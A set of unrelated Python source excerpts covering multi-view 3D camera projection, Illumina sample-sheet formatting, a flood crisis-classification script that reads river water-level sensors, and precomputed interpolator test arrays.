judge_cubic_center_in_view(projection_M, xyz_3D, cube_length, image_shape, ): ''' 'the bool flag of each view can see the center of cubic:' :param projection_M: shape:(N_views, 3, 4) :param xyz_3D: shape:(3) :param cube_length float :param image_shape: (img_h,img_w) :return: view_in_flag: bool array shape: (N_views) ''' img_h_new, img_w_new = perspectiveProj( projection_M=projection_M, xyz_3D=xyz_3D, ) img_h_100, img_w_100 = perspectiveProj( projection_M=projection_M, xyz_3D=xyz_3D + np.array((cube_length, 0, 0)), ) img_h_010, img_w_010 = perspectiveProj( projection_M=projection_M, xyz_3D=xyz_3D + np.array((0, cube_length, 0)), ) img_h_001, img_w_001 = perspectiveProj( projection_M=projection_M, xyz_3D=xyz_3D + np.array((0, 0, cube_length)), ) img_h_011, img_w_011 = perspectiveProj( projection_M=projection_M, xyz_3D=xyz_3D + np.array((0, cube_length, cube_length)), ) img_h_101, img_w_101 = perspectiveProj( projection_M=projection_M, xyz_3D=xyz_3D + np.array((cube_length, 0, cube_length)), ) img_h_110, img_w_110 = perspectiveProj( projection_M=projection_M, xyz_3D=xyz_3D + np.array((cube_length, cube_length, 0)), ) img_h_111, img_w_111 = perspectiveProj( projection_M=projection_M, xyz_3D=xyz_3D + cube_length, ) img_h_bool = (img_h_new < image_shape[0]) * (img_h_new > 0) img_w_bool = (img_w_new < image_shape[1]) * (img_w_new > 0) img_h_bool_001 = (img_h_001 < image_shape[0]) * (img_h_001 > 0) img_w_bool_001 = (img_w_001 < image_shape[1]) * (img_w_001 > 0) img_h_bool_010 = (img_h_010 < image_shape[0]) * (img_h_010 > 0) img_w_bool_010 = (img_w_010 < image_shape[1]) * (img_w_010 > 0) img_h_bool_100 = (img_h_100 < image_shape[0]) * (img_h_100 > 0) img_w_bool_100 = (img_w_100 < image_shape[1]) * (img_w_100 > 0) img_h_bool_011 = (img_h_011 < image_shape[0]) * (img_h_011 > 0) img_w_bool_011 = (img_w_011 < image_shape[1]) * (img_w_011 > 0) img_h_bool_110 = (img_h_110 < image_shape[0]) * (img_h_110 > 0) img_w_bool_110 = (img_w_110 < image_shape[1]) * (img_w_110 > 0) img_h_bool_101 = (img_h_101 < image_shape[0]) * (img_h_101 > 0) img_w_bool_101 = (img_w_101 < image_shape[1]) * (img_w_101 > 0) img_h_bool_111 = (img_h_111 < image_shape[0]) * (img_h_111 > 0) img_w_bool_111 = (img_w_111 < image_shape[1]) * (img_w_111 > 0) view_in_flag = img_h_bool * img_w_bool * img_h_bool_001 * img_w_bool_001 * img_h_bool_010 * img_w_bool_010 * img_h_bool_100 * img_w_bool_100 * img_h_bool_110 * img_w_bool_110 * img_h_bool_101 * img_w_bool_101 * img_h_bool_011 * img_w_bool_011 * img_h_bool_111 * img_w_bool_111 print('the bool flag of each view can see the center of cubic:', view_in_flag.sum()) return view_in_flag[:, 0] def count_gx_gy(projection_M, h_length=1, w_length=1): projection_M_inverse = inverse_camera_matrix(projection_M) N_view = projection_M_inverse.shape[0] vector_101 = np.array(([w_length, 0, 1, 1]))[None, :, None] vector_011 = np.array(([0, h_length, 1, 1]))[None, :, None] vector_001 = np.array(([0, 0, 1, 1]))[None, :, None] global_101 = np.matmul(projection_M_inverse, vector_101)[:, :3, 0] # shape: (N_view, 4,1)->(N_view, 3) global_011 = np.matmul(projection_M_inverse, vector_011)[:, :3, 0] global_001 = np.matmul(projection_M_inverse, vector_001)[:, :3, 0] gx = np.linalg.norm(global_101 - global_001, axis=1) # shape: (N_views) gy = np.linalg.norm(global_011 - global_001, axis=1) return (gx, gy) def generateMetaVector_old( projection_M, cube_xyz_min, cameraTs, cube_D_resol, _cube_D_, ): ''' :param projection_M: shape:(N_views, 3, 4) :param cube_xyz_min: shape:(,3) :param cameraTs: shape:(N_views, 3) :param cube_D_resol: resolution of each voxel float :param _cube_D_: length of cube int :return: meta_vector: the array of each vector represent camera position shape: (N_views, _cube_D_, _cube_D_, _cube_D_, 10) wrapping_vector: the map from each voxel to image shape: (N_views, _cube_D_, _cube_D_, _cube_D_, 3) ''' x = np.arange(0, _cube_D_, 1.0) y = np.arange(0, _cube_D_, 1.0) z = np.arange(0, _cube_D_, 1.0) if not (x.shape[0] == _cube_D_): print('shape of Meta vector went wrong') raise TypeError xx, yy, zz = np.meshgrid(x, y, z) XYZ = np.array([yy.flatten(), xx.flatten(), zz.flatten()]).reshape(3, _cube_D_, _cube_D_, _cube_D_) XYZ = np.moveaxis(XYZ, 0, 3) if not (list(XYZ[0, 1, 3, :])
use as a directory name Multiple disallowed characters in a row are substituted with a single instance of the relevant replacement character: e.g., Hello,,,,Sunshine becomes Hello-Sunshine Parameters ---------- x : str Returns ------- str the input string with whitespaces replaced with underscores and any other non-alphanumeric, non-hyphen, non-underscore characters replaced with a hyphen. """ # Replace any whitespace(s) with underscore x = re.sub(r"\s+", '_', x) # Replace any other character that is not alphanumeric, an underscore, # or a hyphen (and thus valid in a folder name) with a hyphen x = re.sub('[^0-9a-zA-Z-_]+', '-', x) return x @staticmethod def _reverse_complement(seq): """Reverse-complement a sequence From http://stackoverflow.com/a/25189185/7146785 Parameters ---------- seq : str The sequence to reverse-complement Returns ------- str The reverse-complemented sequence """ complement = {'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A'} rev_seq = "".join(complement.get(base, base) for base in reversed(seq)) return rev_seq @staticmethod def _sequencer_i5_index(sequencer, indices): """Decides if the indices should be reversed based on the sequencer """ revcomp_sequencers = ['HiSeq4000', 'MiniSeq', 'NextSeq', 'HiSeq3000'] other_sequencers = ['HiSeq2500', 'HiSeq1500', 'MiSeq', 'NovaSeq'] if sequencer in revcomp_sequencers: return [SequencingProcess._reverse_complement(x) for x in indices] elif sequencer in other_sequencers: return indices else: raise ValueError( 'Your indicated sequencer [%s] is not recognized.\nRecognized ' 'sequencers are: \n' % ' '.join(revcomp_sequencers + other_sequencers)) @staticmethod def _format_sample_sheet_data(sample_ids, i7_name, i7_seq, i5_name, i5_seq, sample_projs, wells=None, sample_plates=None, description=None, lanes=None, sep=',', include_header=True, include_lane=True): """Creates the [Data] component of the Illumina sample sheet Parameters ---------- sample_ids: array-like The bcl2fastq-compatible sample ids i7_name: array-like The i7 index name, in sample_ids order i7_seq: array-like The i7 sequences, in sample_ids order i5_name: array-like The i5 index name, in sample_ids order i5_seq: array-like The i5 sequences, in sample_ids order wells: array-like, optional The well in which the sample is found on the compressed gDNA plate, in sample_ids order. Default: None sample_plate: str, optional The human-readable *sample* plate name. Default: '' NB: This is NOT the plate that the well, above, is relevant to. This fact is not a bug but rather a user requirement per <NAME>. sample_projs: array-like The per-sample short project names for use in grouping demultiplexed samples description: array-like, optional The original sample ids, in sample_ids order. Default: None lanes: array-like, optional The lanes in which the pool will be sequenced. Default: [1] sep: str, optional The file-format separator. Default: ',' include_header: bool, optional Whether to include the header or not. Default: true include_lane: bool, optional Whether to include lane index as the first column. Default: true Returns ------- str The formatted [Data] component of the Illumina sample sheet Raises ------ ValueError If sample_ids, i7_name, i7_seq, i5_name and i5_seq do not have all the same length """ if sample_plates is None: sample_plates = [''] * len(sample_ids) if (len(sample_ids) != len(i7_name) != len(i7_seq) != len(i5_name) != len(i5_seq) != len(sample_plates)): raise ValueError('Sample information lengths are not all equal') if wells is None: wells = [''] * len(sample_ids) if description is None: description = [''] * len(sample_ids) if lanes is None: lanes = [1] data = [] for lane in lanes: for i, sample in enumerate(sample_ids): row = [sample, sample, sample_plates[i], wells[i], i7_name[i], i7_seq[i], i5_name[i], i5_seq[i], sample_projs[i], description[i]] if include_lane: row.insert(0, str(lane)) data.append(sep.join(row)) data = sorted(data) if include_header: columns = [ 'Sample_ID', 'Sample_Name', 'Sample_Plate', 'Sample_Well', 'I7_Index_ID', 'index', 'I5_Index_ID', 'index2', 'Sample_Project', 'Well_Description'] if include_lane: columns.insert(0, 'Lane') data.insert(0, sep.join(columns)) return '\n'.join(data) @staticmethod def _format_sample_sheet_comments(principal_investigator=None, contacts=None, other=None, sep=','): """Formats the sample sheet comments Parameters ---------- principal_investigator: dict, optional The principal investigator information: {name: email} contacts: dict, optional The contacts information: {name: email} other: str, optional Other information to include in the sample sheet comments sep: str, optional The sample sheet separator Returns ------- str The formatted comments of the sample sheet """ comments = [] if principal_investigator is not None: comments.append('PI{0}{1}\n'.format( sep, sep.join( '{0}{1}{2}'.format(x, sep, principal_investigator[x]) for x in principal_investigator.keys()))) if contacts is not None: comments.append( 'Contact{0}{1}\nContact emails{0}{2}\n'.format( sep, sep.join(x for x in sorted(contacts.keys())), sep.join(contacts[x] for x in sorted(contacts.keys())))) if other is not None: comments.append('%s\n' % other) return ''.join(comments) @staticmethod def _set_control_values_to_plate_value(input_df, plate_col_name, projname_col_name): """ Update project name for control samples Ensure that each sample plate included in the dataframe does not contain experimental samples with more than (or less than) one value in the column named projname_col_name. Assuming this is true, set the project column value for each non-experimental sample to the value of the project name for the (single) project on the non-experimental sample's plate. Parameters ---------- input_df: pandas.DataFrame A dataframe containing (at least) a column of plate names (having the column name given in plate_col_name) and a column of project names (having the column name given in projname_col_name)--e.g., Project Name on prep sheet or sample_proj_name on sample sheet-- and one row for each sample (both experimental and non- experimental). The value in the project name column must be None for control (blank/positive control/etc) samples. plate_col_name: str The name of the column in input_df that contains the name of the plate on which a given sample lies. projname_col_name: str The name of the column in input_df that contains the name of the project associated with the given sample. Returns ------- result_df: pandas.DataFrame A copy of the input dataframe, modified so that the controls have the same (single) project name as the experimental samples on their sample plate. Raises ------ ValueError If any plate contains experimental samples from more (or fewer) than one project. """ assert plate_col_name in input_df.columns.values assert projname_col_name in input_df.columns.values result_df = input_df.copy() problem_plate_messages = [] # create a mask to define all the NON-control rows for this plate non_controls_mask = input_df[projname_col_name].notnull() # get all the unique plates in the dataframe unique_plates = input_df[plate_col_name].unique() for curr_unique_plate in unique_plates: # create a mask to define all the rows for this plate plate_mask = input_df[plate_col_name] == curr_unique_plate # create a mask to define all the rows for this plate where the # project name is NOT the control value (None) plate_non_controls_mask = plate_mask & non_controls_mask # get unique project names for the part of df defined in the mask curr_plate_non_controls = input_df[plate_non_controls_mask] curr_plate_projnames = curr_plate_non_controls[projname_col_name] curr_unique_projnames = curr_plate_projnames.unique() if len(curr_unique_projnames) != 1: # Note that we don't error out the first time we find a # plate that doesn't meet expectations; instead we continue to # run through all the plates and identify ALL those that don't # meet expectations. This way the user can correct all of them # at once. curr_err_msg = "Expected one unique value for plate '{0}' " \ "but received {1}: {2}" upn = ", ".join([str(x) for x in curr_unique_projnames]) curr_err_msg = curr_err_msg.format(curr_unique_plate, len(curr_unique_projnames), upn) problem_plate_messages.append(curr_err_msg) else: # create a mask to define all the rows for this plate where the # projname IS the control value (None); ~ "nots" a whole series plate_controls_mask = plate_mask & (~non_controls_mask) # ok to just take first non-control projname because we # verified above there is only one value there anyway result_df.loc[plate_controls_mask, projname_col_name] = \ curr_unique_projnames[0] # end if # next unique plate if len(problem_plate_messages) > 0: raise ValueError("\n".join(problem_plate_messages)) return result_df def _format_sample_sheet(self, data, sep=','): """Formats Illumina-compatible sample sheet. Parameters ---------- data: array-like of str A list of strings containing formatted strings to include in the [Data] component of the sample sheet Returns ------- sample_sheet : str the sample sheet string """ contacts = {c.name: c.email for c in self.contacts} principal_investigator = {self.principal_investigator.name: self.principal_investigator.email} sample_sheet_dict = { 'comments': SequencingProcess._format_sample_sheet_comments( principal_investigator=principal_investigator, contacts=contacts), 'IEMFileVersion': '4', 'Investigator Name': self.principal_investigator.name, 'Experiment Name': self.experiment, 'Date': datetime.strftime(self.date, Process.get_date_format()), 'Workflow': 'GenerateFASTQ', 'Application': 'FASTQ Only', 'Assay': 'TruSeq HT' if self.is_amplicon_assay else self.assay, 'Description': '', 'Chemistry': 'Amplicon' if self.is_amplicon_assay else 'Default', 'read1': self.fwd_cycles, 'read2': self.rev_cycles, 'ReverseComplement': '0', 'data': data} if self.is_amplicon_assay: # these sequences are constant for all TruSeq HT assays # https://support.illumina.com/bulletins/2016/12/what-sequences-do- # i-use-for-adapter-trimming.html sample_sheet_dict['Adapter'] = 'AGATCGGAAGAGCACACGTCTGAACTCCAGTCA' sample_sheet_dict['AdapterRead2'] = ( 'AGATCGGAAGAGCGTCGTGTAGGGAAAGAGTGT') template = ( '{comments}[Header]\nIEMFileVersion{sep}{IEMFileVersion}\n' 'Investigator Name{sep}{Investigator Name}\n' 'Experiment Name{sep}{Experiment Name}\nDate{sep}{Date}\n' 'Workflow{sep}{Workflow}\nApplication{sep}{Application}\n' 'Assay{sep}{Assay}\nDescription{sep}{Description}\n' 'Chemistry{sep}{Chemistry}\n\n[Reads]\n{read1}\n{read2}\n\n' '[Settings]\nReverseComplement{sep}{ReverseComplement}\n' 'Adapter{sep}{Adapter}\nAdapterRead2{sep}{AdapterRead2}\n\n' '[Data]\n{data}'
<reponame>beAWARE-project/crisis-classification<gh_stars>0 # Created Date: 11/09/2018 # Modified Date: 12/09/2018 # # Implements the 2nd algorithm of Crisis Classification module # based on the measurements of water levels from sensors for a # specific 3 weather stations at a) last measurement # or b) at particular date/time period. # If flag_phenTime = True, then the phenomenonTime of each Weather Station will be considered, # otherwise the specific dates/time period will be examined # #---------------------------------------------------------------------------------------------------------- # Inputs: a) Time series of measurements of water levels by the sensors # for a specific weather station at last measurement (date/time) # b) Thresholds for the particular specific weather station and for water river level # # Outputs: TOP104_METRIC_REPORT for each Weather Station and Datastream, which contains: # a) the actual crisis level associated to the sensor position # b) a metric-scale from 0 to 3 depending on whether the actual value exceeds a # particular alarm threshold. # # Algorithm 2 from Crisis Classification (based on AAWA) #---------------------------------------------------------------------------------------------------------- # from bus.bus_producer import BusProducer import json, time from datetime import datetime, timedelta import os, errno import numpy as np from pathlib import Path from CRCL.FloodCRisisCLassification.Topic104_Metric_Report import Top104_Metric_Report from CRCL.FloodCRisisCLassification.Create_Queries import extract_from_WS_Sensors, extract_stations_river, extract_forecasts, extract_station_datastream, extract_station_location from collections import OrderedDict from CRCL.FloodCRisisCLassification.Auxiliary_functions import * from CRCL.FloodCRisisCLassification.topic104Flood import * def CrisisClassificationFlood_Emerg(): ver = 'Ver8_2nd_Period' # Create a directory to store the output files and TOPICS #root_path = Path.cwd() # Create a path current_dirs_parent = os.getcwd() root_path = current_dirs_parent + "/" + "CRCL/FloodCRisisCLassification" + "/" now = datetime.now() directory = root_path + "TOPICS_fromSensors_2010" + "_" + ver + "_" + str(now.year) + "_" + str(now.month) + "_" + str(now.day) os.makedirs(directory, exist_ok=True) #----------------------------------------------------------------------------------- # Fetch data from the OGC SensorThings API # # User defined values in order to formulate the query # service_root_URI = 'https://beaware.server.de/SensorThingsService/v1.0/' SensorThingEntities = ['Things', 'Locations', 'HistoricalLocations', 'Datastreams', 'Sensor', 'Observations', 'ObservedProperties', 'FeaturesOfInterest', 'MultiDatastreams'] SensorThings = [SensorThingEntities[0], SensorThingEntities[3], SensorThingEntities[5]] # Initialise arrays to store the results of comparison for each weather station and each datastream (WL or PR) meas_ColNote_WL = [] meas_ColNote_PR = [] #-------------------------------------------------------------------------------------- # Creates the thresholds for each one of the Weather Stations of interest # Weather_Stations_Ids = [45, 47, 374] Thresholds_WL = [{'ID': 45, 'Alarm1': 4.36, 'Alarm2': 4.86, 'Alarm3': 5.66}, {'ID': 47, 'Alarm1': 3.00, 'Alarm2': 4.60, 'Alarm3': 5.40}, {'ID': 374, 'Alarm1': 1.63, 'Alarm2': 3.03, 'Alarm3': 3.43} ] #Thresholds_PR = [{'ID': 47, 'Alarm1': 50, 'Alarm2': 100, 'Alarm3': 150}, # {'ID': 49, 'Alarm1': 50, 'Alarm2': 100, 'Alarm3': 150}, # {'ID': 374, 'Alarm1': 50, 'Alarm2': 100, 'Alarm3': 150} # ] # PEIRAGMENA THRESHOLDS #Thresholds_WL = [{'ID': 45, 'Alarm1': 0.36, 'Alarm2': 0.6, 'Alarm3': 0.66}, # {'ID': 47, 'Alarm1': 0.01, 'Alarm2': 0.60, 'Alarm3': 0.80}, # {'ID': 374, 'Alarm1': 0.03, 'Alarm2': 0.03, 'Alarm3': 0.43} # ] # Start Timing Step 1 start_step1 = time.time() # Store the time steps time_duration_step = [] #--------------------------------------------------------------------------------------------------- # Step 1: Extracts the weather stations where have as Datastreams the Water Level flag_last_measurement = True # or False # List of dictionaries contains the id of each WS and its one of the Datastreams. # For WS where one of the Datastreams is missing the None value is filled WSDS = [] # dates_WL=[] # flag_phenTime = True # Specify the period date/time for each Weather Station flag_phenTime = False #dates_WL = [{'ID': 45, 'PhenDateTime': ['2010-10-31T21:00:00.000Z', '2010-11-02T22:00:00.000Z']}, # {'ID': 47, 'PhenDateTime': ['2010-10-31T19:00:00.000Z', '2010-11-02T23:00:00.000Z']}, # {'ID': 374, 'PhenDateTime': ['2010-10-31T13:00:00.000Z', '2010-11-02T23:00:00.000Z']} # ] dates_WL = [{'ID': 45, 'PhenDateTime': ['2010-11-01T07:00:00.000Z']}, {'ID': 47, 'PhenDateTime': ['2010-11-01T10:00:00.000Z']}, {'ID': 374, 'PhenDateTime': ['2010-11-02T12:00:00.000Z']} ] for i, StationID in enumerate(Weather_Stations_Ids): WSDS_dict = {'ID': StationID} # extract the location of the station SensThings_Loc = [SensorThingEntities[0], SensorThingEntities[1]] selVals = {'thing_sel': ['id', 'name'], 'loc_sel': ['location']} filt_args = {'thing_filt': ['id']} filt_vals = {'thing_filt': str(StationID)} resp_station_loc = extract_station_location(service_root_URI, SensThings_Loc, selVals, filt_args, filt_vals) SensThings = [SensorThingEntities[0], SensorThingEntities[3]] selVals = {'dstr_sel': ['id', 'name', 'phenomenonTime']} filt_args={'thing_filt': ['id'], 'dstr_filt': ['name']} filt_vals_WL={'thing_filt': str(StationID), 'dstr_filt': ['Water']} resp_station_datastream_WL = extract_station_datastream(service_root_URI, SensThings, selVals, filt_args, filt_vals_WL) # Update WSDS with Weather Station name WSDS_dict.update({'WS_name': resp_station_datastream_WL['value'][0]['name']}) # Keep elements and values for Water Level if len(resp_station_datastream_WL['value'][0]['Datastreams']) == 0: WSDS_dict.update({'WL': None}) WSDS_dict.update({'WL_name': None}) else: WSDS_dict.update({'WL': resp_station_datastream_WL['value'][0]['Datastreams'][0]['@iot.id']}) WSDS_dict.update({'WL_name': resp_station_datastream_WL['value'][0]['Datastreams'][0]['name']}) # Update the date/time equal with the phenomononTime if flag_phenTime == True: dates_WL_dict = {'ID': StationID} PhenDateTime = resp_station_datastream_WL['value'][0]['Datastreams'][0]['phenomenonTime'] dates_WL_dict.update({'PhenDateTime': PhenDateTime[(PhenDateTime.find("/")+1):] }) dates_WL += [dates_WL_dict] # Add station's location to WSDS_dict WSDS_dict.update({'Coordinates': resp_station_loc['value'][0]['Locations'][0]['location']['coordinates']}) # Update the WSDS with the new dictionary for the WS WSDS += [ WSDS_dict ] # print("\n ----------------------- ") # print("WSDS =", WSDS ) # print("--------------------------\n") # End Timing Step 1 end_step1 = time.time() time_duration_step.append( end_step1 - start_step1 ) #----------------------------------------------------------------------------------- # Step 2: Extract real measurements from Sensors at the specific Weather Station # and # Step 3: Create and send the Topic104 #----------------------------------------------------------------------------------- # Start Timing Step 2 start_step2 = time.time() # Open files to store the query responses flname_WL = directory + "/" + 'response_Sensors_WL.txt' outfl_WL = open(flname_WL, 'w') # Arrays to keep the query responses response_sensors_WL = [] # List to store all the Topics 104 Topics104 = [] for i, StationID in enumerate(WSDS): filt_args={'thing_filt': ['id'], 'dstr_filt': ['name'], 'obs_filt': ['phenomenonTime']} sel_vals = {'thing_sel': ['id','name', 'description'], 'dstr_sel': ['id', 'name', 'phenomenonTime'], 'obs_sel': ['result', 'phenomenonTime', 'id']} ord_vals = ['phenomenonTime'] # For WL datastream do: if StationID['WL'] != None: # Find the corresponding PhenomenonTimeDate for WL of the Station for k, j in enumerate(dates_WL): if j['ID'] == StationID['ID']: if len(j) > 1: #['PhenDateTime'] != None: dt = j['PhenDateTime'] filt_vals_WL={'thing_filt': [str(StationID['ID'])], 'dstr_filt': ['Water'], 'obs_filt_vals': dt} # Call function to extract the measurement of WL from specific Station item_WL = extract_from_WS_Sensors(service_root_URI, SensorThings, sel_vals, ord_vals, filt_args, filt_vals_WL) response_sensors_WL.append(item_WL) msg_WL = "\n Station ID = " + str(StationID['ID']) + " and Datastream ID = " + str(StationID['WL']) + "\n" outfl_WL.write(msg_WL) json.dump(item_WL, outfl_WL) outfl_WL.write("\n ------------------------------ \n") # For each observation CRCL finds its scale lenObs = len(item_WL['value'][0]['Datastreams'][0]['Observations']) value = [] for iter_obs in range(0, lenObs): value.append(item_WL['value'][0]['Datastreams'][0]['Observations'][iter_obs]['result']) # call function to compare the value with alarm thresholds if value[iter_obs] > 0.0: color_note_WL = compare_value_scale_thresholds(value[iter_obs] , filt_vals_WL['thing_filt'], filt_vals_WL['dstr_filt'], Thresholds_WL) meas_ColNote_WL_dict = {'ID': StationID['ID'], 'col': color_note_WL[0], 'note': color_note_WL[1], 'scale': color_note_WL[2], 'note_scale': color_note_WL[3]} else: # StationID['WL'] == None: meas_ColNote_WL_dict = {'ID': StationID['ID'], 'col': None, 'note': None, 'scale': None, 'note_scale': None} meas_ColNote_WL += [meas_ColNote_WL_dict] # print("\n ----------------------- ") # print("meas_ColNote_WL =", meas_ColNote_WL ) # print("--------------------------\n") #-------------------------------------------------------------------------------------------- # STEP 3: Creates the TOPIC_104_METRIC_REPORT #-------------------------------------------------------------------------------------------- # # Create the TOPIC 104 (json format) for each Weather Station and datastream # Water Level. The datastream will be consisted of real values # retrieved from the sensors at a particular Weather Station and another dataSeries # metric which presents the scale. # Set variables for the header of the message district = "Vicenza" sent_dateTime = datetime.utcnow().replace(microsecond=0).isoformat() + 'Z' status = "Actual" actionType = "Update" scope = "Public" code = 20190617001 # Set variables for the body of the message dataStreamGener = "CRCL" lang = "en-US" dataStreamCategory = "Met" dataStreamSubCategory = "Flood" # Position of the Weather Station position = [ StationID['Coordinates'][0], StationID['Coordinates'][1] ] #------------------------------------------------------------------------- # If the Water Level datastream exist in the specific Weather Station # Initialize temporary arrays measurement_ID = [] measurement_TimeStamp = [] dataSeriesID = [] dataSeriesName = [] dsmeas_color = [] dsmeas_note = [] yValues = [] xVals = [] if StationID['WL'] != None: dataStreamName = 'OWLm_Observed Water Level Measurement' dataStreamDescript = StationID['WL_name'] + ' ,real measurement' dataStreamID = "FLCR_1012_OWLm" #print("\n dataStreamName = ", dataStreamName, " dataStreamID = ", dataStreamID) # Unique message identifier msgIdent = datetime.utcnow().isoformat().replace(":","").replace("-","").replace(".","MS") # Call the class Top104_Metric_Report to create an object data of this class data_WL = Top104_Metric_Report(msgIdent, sent_dateTime, status, actionType, scope, district, code, dataStreamGener, dataStreamID, dataStreamName, dataStreamDescript, lang, dataStreamCategory, dataStreamSubCategory, position) # Create the header of the object (message) data_WL.create_dictHeader() # Create the body and the measurements of the object (message) # # Extract values from 'response_sensors_WL' pos = [j for j, x in enumerate(response_sensors_WL) if x['value'][0]['@iot.id'] == StationID['ID'] ] val_measurement_ID = str(response_sensors_WL[pos[0]]['value'][0]['Datastreams'][0]['Observations'][0]['@iot.id']) + "_1" measurement_ID += [ val_measurement_ID ] measurement_TimeStamp += [ datetime.utcnow().replace(microsecond=0).isoformat() + 'Z' ] # find the position of station and datasteam to the meas_ColNote_WL list pos_meas = [j for j, x in
7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 1.385029207141E-02, -4.488982302467E-02, -8.350115450764E-02, -7.975908114097E-02, -5.651707329729E-02, -4.876973734940E-02, -5.651707329729E-02, -7.975908114097E-02, -8.350115450764E-02, -4.488982302467E-02, 1.385029207141E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 1.385029207141E-02, -4.488982302467E-02, -8.350115450764E-02, -7.975908114097E-02, -5.651707329729E-02, -4.876973734940E-02, -5.651707329729E-02, -7.975908114097E-02, -8.350115450764E-02, -4.488982302467E-02, 1.385029207141E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02, 7.049456954407E-02], dtype=np.float64 ) #: array holding precalculated linear extrapolation data self.precalc_extrapolation_linear: np.array = np.array( [5.663043205226E-01, 6.276115134204E-01, 6.889187063182E-01, 7.502258992160E-01, 7.655526974405E-01, -3.424867714738E-02, -1.065498256289E+00, -1.744516071724E+00, -1.668065798131E+00, -1.642582373601E+00, -1.668065798131E+00, -1.744516071724E+00, -1.065498256289E+00, -3.424867714738E-02, 7.655526974405E-01, 7.502258992160E-01, 6.889187063182E-01, 6.276115134204E-01, 5.663043205226E-01, 6.276115134204E-01, 5.929572720554E-01, 5.583030306904E-01, 5.236487893254E-01, 5.149852289841E-01, -3.779572577314E-02, -7.381658890282E-01, -1.189597074863E+00, -1.130882889853E+00, -1.111311494850E+00, -1.130882889853E+00, -1.189597074863E+00, -7.381658890282E-01, -3.779572577314E-02, 5.149852289841E-01, 5.236487893254E-01, 5.583030306904E-01, 5.929572720554E-01, 6.276115134204E-01, 6.889187063182E-01, 5.583030306904E-01, 4.276873550626E-01, 2.970716794347E-01, 2.644177605278E-01, -4.134277439891E-02, -4.108335217679E-01, -6.346780780020E-01, -5.936999815753E-01, -5.800406160998E-01, -5.936999815753E-01, -6.346780780020E-01, -4.108335217679E-01, -4.134277439891E-02, 2.644177605278E-01, 2.970716794347E-01, 4.276873550626E-01, 5.583030306904E-01, 6.889187063182E-01, 7.502258992160E-01, 5.236487893254E-01, 2.970716794347E-01, 2.970716794347E-01, 5.236487893254E-01, 7.502258992160E-01, 7.655526974405E-01, 5.149852289841E-01, 2.644177605278E-01, 2.644177605278E-01, 5.149852289841E-01, 7.655526974405E-01, -3.424867714738E-02, -3.779572577314E-02, -4.134277439891E-02, -4.134277439891E-02, -3.779572577314E-02, -3.424867714738E-02, -1.065498256289E+00, -7.381658890282E-01, -4.108335217679E-01, -4.108335217679E-01, -7.381658890282E-01, -1.065498256289E+00, -1.744516071724E+00, -1.189597074863E+00, -6.346780780020E-01, -6.346780780020E-01, -1.189597074863E+00, -1.744516071724E+00, -1.668065798131E+00, -1.130882889853E+00, -5.936999815753E-01, -5.936999815753E-01, -1.130882889853E+00, -1.668065798131E+00, -1.642582373601E+00, -1.111311494850E+00, -5.800406160998E-01, -5.800406160998E-01, -1.111311494850E+00, -1.642582373601E+00, -1.668065798131E+00, -1.130882889853E+00, -5.936999815753E-01, -5.936999815753E-01, -1.130882889853E+00, -1.668065798131E+00, -1.744516071724E+00, -1.189597074863E+00, -6.346780780020E-01, -6.346780780020E-01, -1.189597074863E+00, -1.744516071724E+00, -1.065498256289E+00, -7.381658890282E-01, -4.108335217679E-01, -4.108335217679E-01, -7.381658890282E-01, -1.065498256289E+00, -3.424867714738E-02, -3.779572577314E-02, -4.134277439891E-02, -4.134277439891E-02, -3.779572577314E-02, -3.424867714738E-02, 7.655526974405E-01, 5.149852289841E-01, 2.644177605278E-01, 2.644177605278E-01, 5.149852289841E-01, 7.655526974405E-01, 7.502258992160E-01, 5.236487893254E-01, 2.970716794347E-01, 2.970716794347E-01, 5.236487893254E-01, 7.502258992160E-01, 6.889187063182E-01, 5.583030306904E-01, 4.276873550626E-01, 2.970716794347E-01, 2.644177605278E-01, -4.134277439891E-02, -4.108335217679E-01, -6.346780780020E-01, -5.936999815753E-01, -5.800406160998E-01, -5.936999815753E-01, -6.346780780020E-01, -4.108335217679E-01, -4.134277439891E-02, 2.644177605278E-01, 2.970716794347E-01, 4.276873550626E-01, 5.583030306904E-01, 6.889187063182E-01, 6.276115134204E-01, 5.929572720554E-01, 5.583030306904E-01, 5.236487893254E-01, 5.149852289841E-01, -3.779572577314E-02, -7.381658890282E-01, -1.189597074863E+00, -1.130882889853E+00, -1.111311494850E+00, -1.130882889853E+00, -1.189597074863E+00, -7.381658890282E-01, -3.779572577314E-02, 5.149852289841E-01, 5.236487893254E-01, 5.583030306904E-01, 5.929572720554E-01, 6.276115134204E-01, 5.663043205226E-01, 6.276115134204E-01, 6.889187063182E-01, 7.502258992160E-01, 7.655526974405E-01, -3.424867714738E-02, -1.065498256289E+00, -1.744516071724E+00, -1.668065798131E+00, -1.642582373601E+00, -1.668065798131E+00, -1.744516071724E+00, -1.065498256289E+00, -3.424867714738E-02, 7.655526974405E-01, 7.502258992160E-01, 6.889187063182E-01, 6.276115134204E-01, 5.663043205226E-01], dtype=np.float64 ) class TestInterpolatorLoadBigValues(TestInterpolatorLoadValues): """ Loading small values (10^-20 times the original) instead of the original 2D sinc function test. For description of data storage, see TestInterpolatorLoadValues. """ def __init__(self): super().__init__() #: data array from a function sampled on self.x. dtype should be np.float64 # self.data: np.array = np.sin(self.x) self.data: np.array = np.array( [[7.049456954407E+18, -5.031133752816E+17, -8.474851229653E+18, -7.975908114097E+18, -4.876973734940E+18, -4.876973734940E+18, -7.975908114097E+18, -8.474851229653E+18, -5.031133752816E+17, 7.049456954407E+18], [-5.031133752816E+17, -9.121921863446E+18, -9.251264987298E+16, 1.052139178127E+19, 1.283205555674E+19, 1.283205555674E+19, 1.052139178127E+19, -9.251264987298E+16, -9.121921863446E+18, -5.031133752816E+17], [-8.474851229653E+18, -9.251264987298E+16, 1.283205555674E+19, 1.734970013481E+18, -1.140407180451E+19, -1.140407180451E+19, 1.734970013481E+18, 1.283205555674E+19, -9.251264987298E+16, -8.474851229653E+18], [-7.975908114097E+18, 1.052139178127E+19, 1.734970013481E+18, -2.145503300375E+19, -9.241435356589E+18, -9.241435356589E+18, -2.145503300375E+19, 1.734970013480E+18, 1.052139178127E+19, -7.975908114097E+18], [-4.876973734940E+18, 1.283205555674E+19, 